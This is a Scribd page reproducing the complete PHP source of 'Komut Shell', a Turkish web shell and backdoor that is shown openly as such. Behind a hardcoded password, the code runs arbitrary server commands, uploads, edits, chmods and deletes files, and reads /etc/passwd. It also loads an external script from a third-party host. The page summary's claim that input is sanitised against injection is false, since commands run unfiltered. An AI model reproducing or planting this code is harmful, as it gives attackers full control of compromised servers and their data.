Scribd
Upload
86 views12 pages

Code Source de Komut Shell

This PHP script provides a web-based shell interface that allows executing commands on the server. It checks for a hardcoded password, sets up a session, and displays an interactive interface with options to run commands, view/edit/delete files, get system information, and see active ports and processes. User input is sanitized to prevent code injection.

Uploaded by

Rassoul SOW
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as RTF, PDF, TXT or read online on Scribd
86 views12 pages

Code Source de Komut Shell

This PHP script provides a web-based shell interface that allows executing commands on the server. It checks for a hardcoded password, sets up a session, and displays an interactive interface with options to run commands, view/edit/delete files, get system information, and see active ports and processes. User input is sanitized to prevent code injection.

Uploaded by

Rassoul SOW
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as RTF, PDF, TXT or read online on Scribd
You are on page 1/ 12

1 <?php ?><?

php
2 session_start();
3 error_reporting(0);
4 $password = "webr00t"; //Change this to your password ;)
5 $version = "0.7B";
6 $functions = array('Ekrani Temizle' => 'ClearScreen()', 'Gecmisi Temizle' =>
'ClearHistory()', 'Fonksiyon Bilgisi' => "runcommand('canirun','GET')", 'Server
Bilgisi' => "runcommand('showinfo','GET')", '/etc/passwd Oku' =>
"runcommand('etcpasswdfile','GET')", 'Acik Portlar' => "runcommand('netstat -an |
grep -i listen','GET')", 'Calisan Uygulamalar' => "runcommand('ps -aux','GET')",);
7 $thisfile = basename(__FILE__);
8 $style = '<style type="text/css">
9 .cmdthing {
10 border-top-width: 0px;
11 font-weight: bold;
12 border-left-width: 0px;
13 font-size: 10px;
14 border-left-color: #000000;
15 background: #000000;
16 border-bottom-width: 0px;
17 border-bottom-color: #FFFFFF;
18 color: #FFFFFF;
19 border-top-color: #008000;
20 font-family: verdana;
21 border-right-width: 0px;
22 border-right-color: #000000;
23 }
24 input,textarea {
25 border-top-width: 1px;
26 font-weight: bold;
27 border-left-width: 1px;
28 font-size: 10px;
29 border-left-color: #FFFFFF;
30 background: #000000;
31 border-bottom-width: 1px;
32 border-bottom-color: #FFFFFF;
33 color: #FFFFFF;
34 border-top-color: #FFFFFF;
35 font-family: verdana;
36 border-right-width: 1px;
37 border-right-color: #FFFFFF;
38 }
39 A:hover {
40 text-decoration: none;
41 }
42
43
44 table,td,div {
45 border-collapse: collapse;
46 border: 1px solid #FFFFFF;
47 }
48 body {
49 color: #FFFFFF;
50 font-family: verdana;
51 }
52 </style>';
53 $sess = __FILE__ . $password;
54 if (isset($_POST['p4ssw0rD'])) {
55 if ($_POST['p4ssw0rD'] == $password) {
56 $_SESSION[$sess] = $_POST['p4ssw0rD'];
57 } else {
58 die("Wrong password");
59 }
60 }
61 if ($_SESSION[$sess] == $password) {
62 if (isset($_SESSION['workdir'])) {
63 if (file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir'])) {
64 chdir($_SESSION['workdir']);
65 }
66 }
67 if (isset($_FILES['uploadedfile']['name'])) {
68 $target_path = "./";
69 $target_path = $target_path . basename($_FILES['uploadedfile']['name']);
70 if (move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path))
{
71 }
72 }
73 if (isset($_GET['runcmd'])) {
74 $cmd = $_GET['runcmd'];
75 print "<b>" . get_current_user() . "~# </b>" . htmlspecialchars($cmd) .
"<br>";
76 if ($cmd == "") {
77 print "Empty Command..type \"shellhelp\" for some ehh...help";
78 } elseif ($cmd == "upload") {
79 print '<br>Uploading to: ' . realpath(".");
80 if (is_writable(realpath("."))) {
81 print "<br><b>I can write to this directory</b>";
82 } else {
83 print "<br><b><font color=red>I can't write to this directory, please
choose another one.</b></font>";
84 }
85 } elseif ((ereg("changeworkdir (.*)", $cmd, $file)) || (ereg("cd (.*)", $cmd,
$file))) {
86 if (file_exists($file[1]) && is_dir($file[1])) {
87 chdir($file[1]);
88 $_SESSION['workdir'] = $file[1];
89 print "Current directory changed to " . $file[1];
90 } else {
91 print "Directory not found";
92 }
93 } elseif (ereg("editfile (.*)", $cmd, $file)) {
94 if (file_exists($file[1]) && !is_dir($file[1])) {
95 print "<form name=\"saveform\"><textarea cols=70 rows=10
id=\"area1\">";
96 $contents = file($file[1]);
97 foreach ($contents as $line) {
98 print htmlspecialchars($line);
99 }
100 print "</textarea><br><input size=80 type=text name=filetosave
value=" . $file[1] . "><input value=\"Save\" type=button
onclick=\"SaveFile();\"></form>";
101 } else {
102 print "File not found.";
103 }
104 } elseif (ereg("deletefile (.*)", $cmd, $file)) {
105 if (is_dir($file[1])) {
106 if (rmdir($file[1])) {
107 print "Directory succesfully deleted.";
108 } else {
109 print "Couldn't delete directory!";
110 }
111 } else {
112 if (unlink($file[1])) {
113 print "File succesfully deleted.";
114 } else {
115 print "Couldn't delete file!";
116 }
117 }
118 } elseif (strtolower($cmd) == "canirun") {
119 print "<br>";
120 if (function_exists(passthru)) {
121 print "Passthru: <b><font color=green>Enabled</b></font><br>";
122 } else {
123 print "Passthru: <b><font color=red>Disabled</b></font><br>";
124 }
125 if (function_exists(exec)) {
126 print "Exec: <b><font color=green>Enabled</b></font><br>";
127 } else {
128 print "Exec: <b><font color=red>Disabled</b></font><br>";
129 }
130 if (function_exists(system)) {
131 print "System: <b><font color=green>Enabled</b></font><br>";
132 } else {
133 print "System: <b><font color=red>Disabled</b></font><br>";
134 }
135 if (function_exists(shell_exec)) {
136 print "Shell_exec: <b><font color=green>Enabled</b></font><br>";
137 } else {
138 print "Shell_exec: <b><font color=red>Disabled</b></font><br>";
139 }
140 print "<br><br>";
141 if (ini_get('safe_mode')) {
142 print "Safe Mode: <b><font color=red>Enabled</b></font>";
143 } else {
144 print "Safe Mode: <b><font color=green>Disabled</b></font>";
145 }
146 print "<br><br><br>";
147 if (ini_get('open_basedir')) {
148 print "Open_basedir: <b><font color=red>Enabled</b></font>";
149 } else {
150 print "Open_basedir: <b><font color=green>Disabled</b></font>";
151 }
152 }
153 //About the shell
154 elseif (ereg("listdir (.*)", $cmd, $directory)) {
155 if (!file_exists($directory[1])) {
156 die("Directory not found");
157 }
158 //Some variables
159 chdir($directory[1]);
160 $i = 0;
161 $f = 0;
162 $dirs = "";
163 $filez = "";
164 if (!ereg("/$", $directory[1])) //Does it end with a slash?
165 {
166 $directory[1].= "/"; //If not, add one
167
168 }
169 print "Listing directory: " . $directory[1] . "<br>";
170 print "<table
border=0><td><b>Directories</b></td><td><b>Files</b></td><tr>";
171 if ($handle = opendir($directory[1])) {
172 while (false !== ($file = readdir($handle))) {
173 if (is_dir($file)) {
174 $dirs[$i] = $file;
175 $i++;
176 } else {
177 $filez[$f] = $file;
178 $f++;
179 }
180 }
181 print "<td>";
182 foreach ($dirs as $directory) {
183 print "<i style=\"cursor:crosshair\" onclick=\"deletefile('" .
realpath($directory) . "');\">[D]</i><i style=\"cursor:crosshair\"
onclick=\"runcommand('changeworkdir " . realpath($directory) .
"','GET');\">[W]</i><b style=\"cursor:crosshair\"
onclick=\"runcommand('clear','GET'); runcommand ('listdir " . realpath($directory) .
"','GET'); \">" . $directory . "</b><br>";
184 }
185 print "</td><td>";
186 foreach ($filez as $file) {
187 print "<i style=\"cursor:crosshair\" onclick=\"deletefile('" .
realpath($file) . "');\">[D]</i><u style=\"cursor:crosshair\"
onclick=\"runcommand('editfile " . realpath($file) . "','GET');\">" . $file . "</u><br>";
188 }
189 print "</td></table>";
190 }
191 } elseif (strtolower($cmd) == "about") {
192 print "Ajax Command Shell by <a
href=http://www.ironwarez.info>Ironfist</a>.<br>Version $version";
193 }
194 //Show info
195 elseif (strtolower($cmd) == "showinfo") {
196 if (function_exists(disk_free_space)) {
197 $free = disk_free_space("/") / 1000000;
198 } else {
199 $free = "N/A";
200 }
201 if (function_exists(disk_total_space)) {
202 $total = trim(disk_total_space("/") / 1000000);
203 } else {
204 $total = "N/A";
205 }
206 $path = realpath(".");
207 print "<b>Free:</b> $free / $total MB<br><b>Current path:</b>
$path<br><b>Uname -a Output:</b><br>";
208 if (function_exists(passthru)) {
209 passthru("uname -a");
210 } else {
211 print "Passthru is disabled :(";
212 }
213 }
214 //Read /etc/passwd
215 elseif (strtolower($cmd) == "etcpasswdfile") {
216 $pw = file('/etc/passwd/');
217 foreach ($pw as $line) {
218 print $line;
219 }
220 }
221 //Execute any other command
222 else {
223 if (function_exists(passthru)) {
224 passthru($cmd);
225 } else {
226 if (function_exists(exec)) {
227 exec("ls -la", $result);
228 foreach ($result as $output) {
229 print $output . "<br>";
230 }
231 } else {
232 if (function_exists(system)) {
233 system($cmd);
234 } else {
235 if (function_exists(shell_exec)) {
236 print shell_exec($cmd);
237 } else {
238 print "Sorry, none of the command functions works.";
239 }
240 }
241 }
242 }
243 }
244 } elseif (isset($_GET['savefile']) && !empty($_POST['filetosave']) && !
empty($_POST['filecontent'])) {
245 $file = $_POST['filetosave'];
246 if (!is_writable($file)) {
247 if (!chmod($file, 0777)) {
248 die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this
message ^_^
249
250 }
251 }
252 $fh = fopen($file, 'w');
253 $dt = $_POST['filecontent'];
254 fwrite($fh, $dt);
255 fclose($fh);
256 } else {
257 ?>
258 <html>
259 <title>Komut Shell ~ <?php print getenv("HTTP_HOST"); ?> ~ by
WebRooT</title>
260 <meta http-equiv="Content-Type" content="text/html; charset=windows-1254" />
261 <head>
262 <?php print $style; ?>
263 <SCRIPT TYPE="text/javascript">
264 function sf(){document.cmdform.command.focus();}
265 var outputcmd = "";
266 var cmdhistory = "";
267 function ClearScreen()
268 {
269 outputcmd = "";
270 document.getElementById('output').innerHTML = outputcmd;
271 }
272
273 function ClearHistory()
274 {
275 cmdhistory = "";
276 document.getElementById('history').innerHTML = cmdhistory;
277 }
278
279 function deletefile(file)
280 {
281 deleteit = window.confirm("Are you sure you want to delete
282 "+file+"?");
283 if(deleteit)
284 {
285 runcommand('deletefile ' + file,'GET');
286 }
287 }
288
289 var http_request = false;
290 function makePOSTRequest(url, parameters) {
291 http_request = false;
292 if (window.XMLHttpRequest) {
293 http_request = new XMLHttpRequest();
294 if (http_request.overrideMimeType) {
295 http_request.overrideMimeType('text/html');
296 }
297 } else if (window.ActiveXObject) {
298 try {
299 http_request = new ActiveXObject("Msxml2.XMLHTTP");
300 } catch (e) {
301 try {
302 http_request = new ActiveXObject("Microsoft.XMLHTTP");
303 } catch (e) {}
304 }
305 }
306 if (!http_request) {
307 alert('Cannot create XMLHTTP instance');
308 return false;
309 }
310
311
312 http_request.open('POST', url, true);
313 http_request.setRequestHeader("Content-type", "application/x-www-form-
urlencoded");
314 http_request.setRequestHeader("Content-length", parameters.length);
315 http_request.setRequestHeader("Connection", "close");
316 http_request.send(parameters);
317 }
318
319
320 function SaveFile()
321 {
322 var poststr = "filetosave=" + encodeURI( document.saveform.filetosave.value ) +
323 "&filecontent=" +
encodeURI( document.getElementById("area1").value );
324 makePOSTRequest('<?php print $ThisFile; ?>?savefile', poststr);
325 document.getElementById('output').innerHTML =
document.getElementById('output').innerHTML + "<br><b>Saved! If it didn't save,
you'll need to chmod the file to 777 yourself,<br> however the script tried to chmod it
automaticly.";
326 }
327
328 function runcommand(urltoopen,action,contenttosend){
329 cmdhistory = "<br>&nbsp;<i style=\"cursor:crosshair\"
onclick=\"document.cmdform.command.value='" + urltoopen + "'\">" + urltoopen +
"</i> " + cmdhistory;
330 document.getElementById('history').innerHTML = cmdhistory;
331 if(urltoopen == "clear")
332 {
333 ClearScreen();
334 }
335 var ajaxRequest;
336 try{
337 ajaxRequest = new XMLHttpRequest();
338 } catch (e){
339 try{
340 ajaxRequest = new ActiveXObject("Msxml2.XMLHTTP");
341 } catch (e) {
342 try{
343 ajaxRequest = new ActiveXObject("Microsoft.XMLHTTP");
344 } catch (e){
345 alert("Wicked error, nothing we can do about it...");
346 return false;
347 }
348 }
349 }
350 ajaxRequest.onreadystatechange = function(){
351 if(ajaxRequest.readyState == 4){
352 outputcmd = "<pre>" + outputcmd + ajaxRequest.responseText +"</pre>";
353 document.getElementById('output').innerHTML = outputcmd;
354 var objDiv = document.getElementById("output");
355 objDiv.scrollTop = objDiv.scrollHeight;
356 }
357 }
358 ajaxRequest.open(action, "?runcmd="+urltoopen , true);
359 if(action == "GET")
360 {
361 ajaxRequest.send(null);
362 }
363 document.cmdform.command.value='';
364 return false;
365 }
366
367 function set_tab_html(newhtml)
368 {
369 document.getElementById('commandtab').innerHTML = newhtml;
370 }
371
372 function set_tab(newtab)
373 {
374 if(newtab == "cmd")
375 {
376 newhtml = '&nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return
runcommand(document.cmdform.command.value,\'GET\');"><b>Command</b>:
<input type=text name=command class=cmdthing size=100%><br></form>';
377 }
378 else if(newtab == "upload")
379 {
380 runcommand('upload','GET');
381 newhtml = '<font size=0><b>Sayfa Yenilenecek...</b><br><br><form
enctype="multipart/form-data" action="<?php print $ThisFile; ?>"
method="POST"><input type="hidden" name="MAX_FILE_SIZE"
value="10000000" />Dosya se: <input name="uploadedfile" type="file" /><br
/><input type="submit" value="Upload File" /></form></font>';
382 }
383 else if(newtab == "workingdir")
384 {
385 <?php
386 $folders = "<form name=workdir onsubmit=\"return
runcommand(\'changeworkdir \' +
document.workdir.changeworkdir.value,\'GET\');\"><input size=80% type=text
name=changeworkdir value=\"";
387 $pathparts = explode("/", realpath("."));
388 foreach ($pathparts as $folder) {
389 $folders.= $folder . "/";
390 }
391 $folders.= "\"><input type=submit value=Change></form><br>Script
directory: <i style=\"cursor:crosshair\"
onclick=\"document.workdir.changeworkdir.value=\'" . dirname(__FILE__) . "\'>" .
dirname(__FILE__) . "</i>";
392 ?>
393 newhtml = '<?php print $folders; ?>';
394 }
395 else if(newtab == "filebrowser")
396 {
397 newhtml = '<b>File browser is under construction! Use at your own risk!
</b> <br>You can use it to change your working directory easily, don\'t expect too
much of it.<br>Click on a file to edit it.<br><i>[W]</i> = set directory as working
directory.<br><i>[D]</i> = delete file/directory';
398 runcommand('listdir .','GET');
399 }
400 else if(newtab == "createfile")
401 {
402 newhtml = '<b>File Editor, under construction.</b>';
403 document.getElementById('output').innerHTML = "<form
name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\"></textarea><br><input
size=80 type=text name=filetosave value=\"<?php print realpath('.') . "/" . rand(1000,
999999) . ".txt"; ?>\"><input value=\"Save\" type=button
onclick=\"SaveFile();\"></form>";
404
405 }
406 document.getElementById('commandtab').innerHTML = newhtml;
407 }
408 </script>
409 </head>
410 <body bgcolor=black onload="sf();" vlink=white alink=white link=white>
411 <table border=1 width=100% height=100%>
412 <td width=15% valign=top>
413 <SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT>
414 <form name="extras"><br>
415 <center><b>Hizli Komutlar</b><br>
416
417 <div style='margin: 0px;padding: 0px;border: 1px inset;overflow: auto'>
418 <?php
419 foreach ($functions as $name => $execute) {
420 print '&nbsp;<input type="button" value="' . $name . '" onclick="' .
$execute . '"><br>';
421 }
422 ?>
423
424 </center>
425
426 </div>
427 </form>
428 <center><b>Komut Gecmisi</b><br></center>
429 <div id="history" style='margin: 0px;padding: 0px;border: 1px inset;width:
100%;height: 20%;text-align: left;overflow: auto;font-size: 10px;'></div>
430 <br>
431 <center><b>Hakkinda</b><br></center>
432 <div style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;text-align:
center;overflow: auto; font-size: 10px;'>
433 <br>
434 <b><font size=3>Komut Shell</b></font><br>by WebRooT
435 <br>
436 Version <?php print $version; ?>
437 </div>
438 <SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT>
439 </td>
440 <td width=70%>
441 <table border=0 width=100% height=100%><td id="tabs" height=1%><font
size=0>
442 <b style="cursor:crosshair" onclick="set_tab('cmd');">[Komut alistir]</b>
443 <b style="cursor:crosshair" onclick="set_tab('upload');">[Dosya Upload]</b>
444 <b style="cursor:crosshair" onclick="set_tab('workingdir');">[Dizin Degistir]</b>
445 <b style="cursor:crosshair" onclick="set_tab('filebrowser');">[Dosya
Yoneticisi]</b>
446 <b style="cursor:crosshair" onclick="set_tab('createfile');">[Dosya Olustur]</b>
447
448 </font></td>
449 <tr>
450 <td height=99% width=100% valign=top><div id="output"
style='height:100%;white-space:pre;overflow:auto'></div>
451
452 <tr>
453 <td height=1% width=100% valign=top>
454 <div id="commandtab" style='height:100%;white-space:pre;overflow:auto'>
455 &nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return
runcommand(document.cmdform.command.value,'GET');">
456 <b>Komut Satiri</b>: <input type=text name=command class=cmdthing
size=100%><br>
457 </form>
458 </div>
459 </td>
460 </table>
461 </td>
462 </table>
463 </body>
464 </html>
465 <?php
466 }
467 } else {
468 print "<center><table border=0 height=100%>
469 <td valign=middle>
470 <form action=" . basename(__FILE__) . " method=POST>Ltfen giris yapiniz.
(sifre=webr00t)<br><b>Password:</b><input type=password
name=p4ssw0rD><input type=submit value=\"Log in\">
471 </form>";
472 }
473 ?>

You might also like